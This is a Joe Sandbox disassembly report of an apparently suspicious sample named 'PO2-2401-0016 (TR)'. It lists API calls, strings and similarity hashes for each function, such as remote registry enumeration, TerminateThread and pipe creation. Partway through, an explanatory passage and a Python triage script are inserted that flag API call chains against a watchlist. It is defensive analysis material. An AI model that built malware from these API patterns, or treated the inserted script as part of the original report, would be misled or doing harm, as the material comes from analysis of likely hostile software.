                                • Instruction Fuzzy Hash: 9441CE31600214BFDB109F68DC85BAABBAAEF45324F14805AFD159F392C770AD85CBE1
                                APIs
                                  • Part of subcall function 001BDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,001BCF22,?), ref: 001BDDFD
                                  • Part of subcall function 001BDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,001BCF22,?), ref: 001BDE16
                                • lstrcmpiW.KERNEL32(?,?), ref: 001BCF45
                                • MoveFileW.KERNEL32(?,?), ref: 001BCF7F
                                • _wcslen.LIBCMT ref: 001BD005
                                • _wcslen.LIBCMT ref: 001BD01B
                                • SHFileOperationW.SHELL32(?), ref: 001BD061
                                Strings
                                Similarity
                                • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                • String ID: \*.*
                                • API String ID: 3164238972-1173974218
                                • Opcode ID: 07b6e038156d44a0bfaa710b1aa537ad17ad3965e000988f53cd3c14596d8c86
                                • Instruction ID: 7a6d321314dcc24ece057635c3078f6289e0fde1407336d2bcc319d23819d719
                                • Opcode Fuzzy Hash: 07b6e038156d44a0bfaa710b1aa537ad17ad3965e000988f53cd3c14596d8c86
                                • Instruction Fuzzy Hash: EF4149719452199FDF16EFA4DD81AEE77F9AF18340F1000EAE509EB141EB34A689CB50
                                APIs
                                • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 001E2E1C
                                • GetWindowLongW.USER32(00000000,000000F0), ref: 001E2E4F
                                • GetWindowLongW.USER32(00000000,000000F0), ref: 001E2E84
                                • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 001E2EB6
                                • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 001E2EE0
                                • GetWindowLongW.USER32(00000000,000000F0), ref: 001E2EF1
                                • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 001E2F0B
                                Similarity
                                • API ID: LongWindow$MessageSend
                                • String ID:
                                • API String ID: 2178440468-0
                                • Opcode ID: f7137c6276b2d57230518f611f7896d7d5b5296c6f3e617d9a52161d17c3f965
                                • Instruction ID: 43202794b62cd06218753f4d3c693f5e34e20336130b2ecdf1239d843a037169
                                • Opcode Fuzzy Hash: f7137c6276b2d57230518f611f7896d7d5b5296c6f3e617d9a52161d17c3f965
                                • Instruction Fuzzy Hash: 7B3108316046A0AFDB21CF99DC98FA937E9FB5A710F1911A4F9009F2B1CB71AC91DB41
                                APIs
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001B7769
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001B778F
                                • SysAllocString.OLEAUT32(00000000), ref: 001B7792
                                • SysAllocString.OLEAUT32(?), ref: 001B77B0
                                • SysFreeString.OLEAUT32(?), ref: 001B77B9
                                • StringFromGUID2.OLE32(?,?,00000028), ref: 001B77DE
                                • SysAllocString.OLEAUT32(?), ref: 001B77EC
                                Similarity
                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                • String ID:
                                • API String ID: 3761583154-0
                                • Opcode ID: dfdd707aaea496d3341a9195793de32d8e387da2a715c81f04ad9c872f4ead0e
                                • Instruction ID: cb906dba4ee217f17cb50b36e21795b3167de9c0b65025e98744507b7e5a2b72
                                • Opcode Fuzzy Hash: dfdd707aaea496d3341a9195793de32d8e387da2a715c81f04ad9c872f4ead0e
                                • Instruction Fuzzy Hash: E4218E76604259AFDB10EFA8DC88CFB77ACEB49764B148425FA15DB190DB70DC8287A0
                                APIs
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001B7842
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001B7868
                                • SysAllocString.OLEAUT32(00000000), ref: 001B786B
                                • SysAllocString.OLEAUT32 ref: 001B788C
                                • SysFreeString.OLEAUT32 ref: 001B7895
                                • StringFromGUID2.OLE32(?,?,00000028), ref: 001B78AF
                                • SysAllocString.OLEAUT32(?), ref: 001B78BD
                                Similarity
                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                • String ID:
                                • API String ID: 3761583154-0
                                • Opcode ID: 745c476e6d0d35ce9817407adc4c3694194f6062a80836c06331bcef221a56b2
                                • Instruction ID: f5bbfd388f81a2a7d1f77b45d8f07e63d5060fe6299f6363995339b153d9a049
                                • Opcode Fuzzy Hash: 745c476e6d0d35ce9817407adc4c3694194f6062a80836c06331bcef221a56b2
                                • Instruction Fuzzy Hash: 5C214135608204AFDB109FF8DC88DAA77ECEB497607118125F915CB2E1D774DC82CB64
                                APIs
                                • GetStdHandle.KERNEL32(0000000C), ref: 001C04F2
                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 001C052E
                                Strings
                                Similarity
                                • API ID: CreateHandlePipe
                                • String ID: nul
                                • API String ID: 1424370930-2873401336
                                • Opcode ID: f2b1110ed284eba0a4c570e5795ea07994b71ffdff7ce92f006843478f2dd7c7
                                • Instruction ID: 17f9f21cde42401f42a5918665583ef1816dec9b1ca6d7bf3b88edd325880499
                                • Opcode Fuzzy Hash: f2b1110ed284eba0a4c570e5795ea07994b71ffdff7ce92f006843478f2dd7c7
                                • Instruction Fuzzy Hash: 88218B70500345EFCF218F68DC44F9A7BA4AF69724F204A1CE8A1D62E0D770D981CF60
                                APIs
                                • GetStdHandle.KERNEL32(000000F6), ref: 001C05C6
                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 001C0601
                                Strings
                                Similarity
                                • API ID: CreateHandlePipe
                                • String ID: nul
                                • API String ID: 1424370930-2873401336
                                • Opcode ID: f6686247d817808ab471dd7bd956ee89a994200f721d1f5ca1d488c6ea65df39
                                • Instruction ID: b46ab60be6f027d9cb72d937c48068b8a0203cb22c03c77b3bffcc88db29af56
                                • Opcode Fuzzy Hash: f6686247d817808ab471dd7bd956ee89a994200f721d1f5ca1d488c6ea65df39
                                • Instruction Fuzzy Hash: 56217175500325DBDB219F698C44F9A77E4BFA9720F200A1DE9A1E72D0D770D8A1CB50
                                APIs
                                  • Part of subcall function 0015600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0015604C
                                  • Part of subcall function 0015600E: GetStockObject.GDI32(00000011), ref: 00156060
                                  • Part of subcall function 0015600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0015606A
                                • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 001E4112
                                • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 001E411F
                                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 001E412A
                                • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 001E4139
                                • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 001E4145
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: MessageSend$CreateObjectStockWindow
                                • String ID: Msctls_Progress32
                                • API String ID: 1025951953-3636473452
                                • Opcode ID: 88281d5183de89c9579b2907bcb0cdaf2ec05bac6c18a2bbe1e285c695779c11
                                • Instruction ID: 3af6deb1c6b9e997a32f805ed98ea598e133ac3b3ad986c9a2aa0f468f19b244
                                • Opcode Fuzzy Hash: 88281d5183de89c9579b2907bcb0cdaf2ec05bac6c18a2bbe1e285c695779c11
                                • Instruction Fuzzy Hash: 5311E2B2140219BFEF108FA5CC85EEB7FADEF18798F014110BA18A6190C7729C61DBA0
                                APIs
                                  • Part of subcall function 0018D7A3: _free.LIBCMT ref: 0018D7CC
                                • _free.LIBCMT ref: 0018D82D
                                  • Part of subcall function 001829C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0018D7D1,00000000,00000000,00000000,00000000,?,0018D7F8,00000000,00000007,00000000,?,0018DBF5,00000000), ref: 001829DE
                                  • Part of subcall function 001829C8: GetLastError.KERNEL32(00000000,?,0018D7D1,00000000,00000000,00000000,00000000,?,0018D7F8,00000000,00000007,00000000,?,0018DBF5,00000000,00000000), ref: 001829F0
                                • _free.LIBCMT ref: 0018D838
                                • _free.LIBCMT ref: 0018D843
                                • _free.LIBCMT ref: 0018D897
                                • _free.LIBCMT ref: 0018D8A2
                                • _free.LIBCMT ref: 0018D8AD
                                • _free.LIBCMT ref: 0018D8B8
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                • Instruction ID: 38369d7d34ce96af2da375efbfe2ed07394711bc4936eb74495af0a8db797c9b
                                • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                • Instruction Fuzzy Hash: 08112971940B14AAD622BFF0DC46FCB7B9CAF20704F400825F299A60D2DB79A6058B61
                                APIs
                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 001BDA74
                                • LoadStringW.USER32(00000000), ref: 001BDA7B
                                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 001BDA91
                                • LoadStringW.USER32(00000000), ref: 001BDA98
                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 001BDADC
                                Strings
                                • %s (%d) : ==> %s: %s %s, xrefs: 001BDAB9
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: HandleLoadModuleString$Message
                                • String ID: %s (%d) : ==> %s: %s %s
                                • API String ID: 4072794657-3128320259
                                • Opcode ID: e3c8d6bf6de33e032070eb1b0c6644fb44f5e2ebde7c211be519373dfb529808
                                • Instruction ID: 307d98c1b663cc4adc1a5832b386f99eec24c4ff6b4d9f4371b1c27d420e7ec3
                                • Opcode Fuzzy Hash: e3c8d6bf6de33e032070eb1b0c6644fb44f5e2ebde7c211be519373dfb529808
                                • Instruction Fuzzy Hash: F0014FF6900248BBEB109BE09D89EEB736CEB08301F400491F716E6041E7749EC58BB4
                                APIs
                                • InterlockedExchange.KERNEL32(00E14678,00E14678), ref: 001C097B
                                • EnterCriticalSection.KERNEL32(00E14658,00000000), ref: 001C098D
                                • TerminateThread.KERNEL32(0000000E,000001F6), ref: 001C099B
                                • WaitForSingleObject.KERNEL32(0000000E,000003E8), ref: 001C09A9
                                • CloseHandle.KERNEL32(0000000E), ref: 001C09B8
                                • InterlockedExchange.KERNEL32(00E14678,000001F6), ref: 001C09C8
                                • LeaveCriticalSection.KERNEL32(00E14658), ref: 001C09CF
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                • String ID:
                                • API String ID: 3495660284-0
                                • Opcode ID: 8c7c595000582326b13e72698e6cbc663c3232aa1937eb027db5723c46413683
                                • Instruction ID: 809dfcb7bcae9916308aae877948b78256cccded7a25d989e805f40c1b95000a
                                • Opcode Fuzzy Hash: 8c7c595000582326b13e72698e6cbc663c3232aa1937eb027db5723c46413683
                                • Instruction Fuzzy Hash: 06F0C932442A52EBD7525BA4EEC9BDABA29BF05706F402025F20298CA1C77595A6CFD0
                                APIs
                                • __allrem.LIBCMT ref: 001800BA
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001800D6
                                • __allrem.LIBCMT ref: 001800ED
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0018010B
                                • __allrem.LIBCMT ref: 00180122
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00180140
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                • String ID:
                                • API String ID: 1992179935-0
                                • Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                • Instruction ID: 8eb06c957246371daf8fd1cdcdf86d21b5240b5f5e0fa4e087c60e3c9423260f
                                • Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                • Instruction Fuzzy Hash: 1D81F672600B0AABE725AE68CC41B6B73F8AF55374F24823EF415D6281EB70DA458F50
                                APIs
                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,001782D9,001782D9,?,?,?,0018644F,00000001,00000001,8BE85006), ref: 00186258
                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0018644F,00000001,00000001,8BE85006,?,?,?), ref: 001862DE
                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 001863D8
                                • __freea.LIBCMT ref: 001863E5
                                  • Part of subcall function 00183820: RtlAllocateHeap.NTDLL(00000000,?,00221444,?,0016FDF5,?,?,0015A976,00000010,00221440,001513FC,?,001513C6,?,00151129), ref: 00183852
                                • __freea.LIBCMT ref: 001863EE
                                • __freea.LIBCMT ref: 00186413
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ByteCharMultiWide__freea$AllocateHeap
                                • String ID:
                                • API String ID: 1414292761-0
                                • Opcode ID: 3b728338001f96fdbd858df7ad3b8e3f30e12f9ea88e87cb2f77bbe62de9dd68
                                • Instruction ID: 1fd19a3a683dd90f9c3194d2452c255ec1e1fcf483ff6df57f1810c5a722df95
                                • Opcode Fuzzy Hash: 3b728338001f96fdbd858df7ad3b8e3f30e12f9ea88e87cb2f77bbe62de9dd68
                                • Instruction Fuzzy Hash: 2A51E372A00216ABEB25AF64DC81EBF77AAEB54710F154669FC09D6140EB34DE40CBA0
                                APIs
                                  • Part of subcall function 00159CB3: _wcslen.LIBCMT ref: 00159CBD
                                  • Part of subcall function 001DC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,001DB6AE,?,?), ref: 001DC9B5
                                  • Part of subcall function 001DC998: _wcslen.LIBCMT ref: 001DC9F1
                                  • Part of subcall function 001DC998: _wcslen.LIBCMT ref: 001DCA68
                                  • Part of subcall function 001DC998: _wcslen.LIBCMT ref: 001DCA9E
                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001DBCCA
                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 001DBD25
                                • RegCloseKey.ADVAPI32(00000000), ref: 001DBD6A
                                • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 001DBD99
                                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 001DBDF3
                                • RegCloseKey.ADVAPI32(?), ref: 001DBDFF
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                • String ID:
                                • API String ID: 1120388591-0
                                • Opcode ID: 050bce1be141f913525cc232035b4080567231c1762d96d484611a9bfdf0612d
                                • Instruction ID: 42bde17ac3582255cd1b4549f87c6d3955c3115c7d467b7c781cb4737f9ff630
                                • Opcode Fuzzy Hash: 050bce1be141f913525cc232035b4080567231c1762d96d484611a9bfdf0612d
                                • Instruction Fuzzy Hash: 58815830218241EFD714DF64C8D5E2ABBE5BF84308F15895DF45A8B2A2DB31ED49CB92
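                                 Every function record in this listing has the same five-part layout (APIs, Strings, Memory Dump Source, Joe Sandbox IDA Plugin, Similarity), with one bullet per API call in the form "name.MODULE(args), ref: address" and "Part of subcall function X:" marking calls made by a callee. The Python below is an added example, not Joe Sandbox code and not part of the report: it parses records in that layout into per-function API call chains and flags chains that match a small watchlist. The watchlist (registry enumeration via RegConnectRegistryW/RegEnumValueW, TerminateThread, CreatePipe with GetStdHandle) is my own illustrative choice, not a Joe Sandbox classification, and the embedded sample is three records copied from this listing and trimmed.

```python
# Added example (not Joe Sandbox code): parse the per-function records of this
# listing into API call chains and flag chains worth a closer look.
import re
from dataclasses import dataclass, field

# One "• <api>.<module>(<args>), ref: <addr>" line. LIBCMT entries carry no
# argument list; "Part of subcall function X:" marks a call made by callee X.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>[^\s(.]+)\.(?P<mod>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$")
# Generic "• Key: value" line (Memory Dump Source, Similarity, ...).
KV_RE = re.compile(r"^\s*•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: str          # call-site address inside the dumped image
    subcall_of: str   # callee address for indirect calls, "" for direct ones

@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    meta: dict = field(default_factory=dict)

def parse_records(text):
    """Split the listing into records; every record starts at an 'APIs' header."""
    records, current, section = [], None, None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped in SECTIONS:
            section = stripped
            if section == "APIs":
                current = FunctionRecord()
                records.append(current)
            continue
        if current is None or not stripped.startswith("•"):
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                args = m["args"].split(",") if m["args"] else []
                current.calls.append(
                    ApiCall(m["api"], m["mod"], args, m["ref"], m["sub"] or ""))
        elif section == "Strings":
            current.strings.append(stripped.lstrip("•").strip())
        else:
            m = KV_RE.match(line)
            if m:
                current.meta[m["key"].strip()] = m["val"].strip()
    return records

# Illustrative watchlist (my choice, not a Joe Sandbox classification): a record
# is flagged when every API in the set appears among its direct calls.
WATCHLIST = {
    "registry value enumeration (RegConnectRegistryW can target a remote host)":
        {"RegConnectRegistryW", "RegEnumValueW"},
    "forcible thread termination": {"TerminateThread"},
    "anonymous pipe paired with a standard handle": {"CreatePipe", "GetStdHandle"},
}

def triage(records, watchlist=WATCHLIST):
    """Return (first direct call-site ref, reason, call chain) per watchlist hit."""
    hits = []
    for rec in records:
        direct = [c for c in rec.calls if not c.subcall_of]
        names = [c.api for c in direct]
        for reason, needed in watchlist.items():
            if direct and needed <= set(names):
                hits.append((direct[0].ref, reason, " -> ".join(names)))
    return hits

# Constructed sample: three records copied from this listing and trimmed.
SAMPLE = """\
APIs
• GetStdHandle.KERNEL32(000000F6), ref: 001C05C6
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 001C0601
Similarity
• String ID: nul
APIs
  • Part of subcall function 00159CB3: _wcslen.LIBCMT ref: 00159CBD
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001DBCCA
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 001DBD25
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 001DBD99
• RegCloseKey.ADVAPI32(?), ref: 001DBDFF
APIs
• InterlockedExchange.KERNEL32(00E14678,00E14678), ref: 001C097B
• TerminateThread.KERNEL32(0000000E,000001F6), ref: 001C099B
• CloseHandle.KERNEL32(0000000E), ref: 001C09B8
"""

if __name__ == "__main__":
    for ref, reason, chain in triage(parse_records(SAMPLE)):
        print(f"{ref}: {reason}\n    {chain}")
```

                                 The records do not state the function's own start address, so each hit is keyed by its first direct call site; the "Instruction Fuzzy Hash" in the Similarity part is kept in the record's meta dictionary if a different key is needed. Calls listed as "Part of subcall function" are parsed but excluded from the chain, so a hit always reflects what the function itself calls.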
                                APIs
                                • VariantInit.OLEAUT32(00000035), ref: 001AF7B9
                                • SysAllocString.OLEAUT32(00000001), ref: 001AF860
                                • VariantCopy.OLEAUT32(001AFA64,00000000), ref: 001AF889
                                • VariantClear.OLEAUT32(001AFA64), ref: 001AF8AD
                                • VariantCopy.OLEAUT32(001AFA64,00000000), ref: 001AF8B1
                                • VariantClear.OLEAUT32(?), ref: 001AF8BB
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Variant$ClearCopy$AllocInitString
                                • String ID:
                                • API String ID: 3859894641-0
                                • Opcode ID: 29639964f086e58efda4a297fc128751532bd43d54314cddaacb354161cb7826
                                • Instruction ID: f1f7d82d9ffd6fe9d8fbcbf07cba01a9535c2d1ee1c0cf9bb178335d808c3762
                                • Opcode Fuzzy Hash: 29639964f086e58efda4a297fc128751532bd43d54314cddaacb354161cb7826
                                • Instruction Fuzzy Hash: EC51E639600310FACF24AFE5D895B2AB3A4EF56314F24846EF805DF292DB708C46C796
                                APIs
                                  • Part of subcall function 00157620: _wcslen.LIBCMT ref: 00157625
                                  • Part of subcall function 00156B57: _wcslen.LIBCMT ref: 00156B6A
                                • GetOpenFileNameW.COMDLG32(00000058), ref: 001C94E5
                                • _wcslen.LIBCMT ref: 001C9506
                                • _wcslen.LIBCMT ref: 001C952D
                                • GetSaveFileNameW.COMDLG32(00000058), ref: 001C9585
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: _wcslen$FileName$OpenSave
                                • String ID: X
                                • API String ID: 83654149-3081909835
                                • Opcode ID: cbb312f7593108624329e25aa1bb9360deed5419b9389c2a09b8697e0546b5bd
                                • Instruction ID: 37d7729b8ed6b7631e48bcc52184e210e9ec09c6ecc407711d5054586c10c067
                                • Opcode Fuzzy Hash: cbb312f7593108624329e25aa1bb9360deed5419b9389c2a09b8697e0546b5bd
                                • Instruction Fuzzy Hash: 78E17D31608340CFD724DF24D885F6AB7E4BFA5314F04896DE8999B2A2DB31ED05CB92
                                APIs
                                  • Part of subcall function 00169BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00169BB2
                                • BeginPaint.USER32(?,?,?), ref: 00169241
                                • GetWindowRect.USER32(?,?), ref: 001692A5
                                • ScreenToClient.USER32(?,?), ref: 001692C2
                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 001692D3
                                • EndPaint.USER32(?,?,?,?,?), ref: 00169321
                                • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 001A71EA
                                  • Part of subcall function 00169339: BeginPath.GDI32(00000000), ref: 00169357
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                • String ID:
                                • API String ID: 3050599898-0
                                • Opcode ID: ac00d48b234ae191ff4e56c95280cddfd7c12fccb12e865502c1375fbe6f4afd
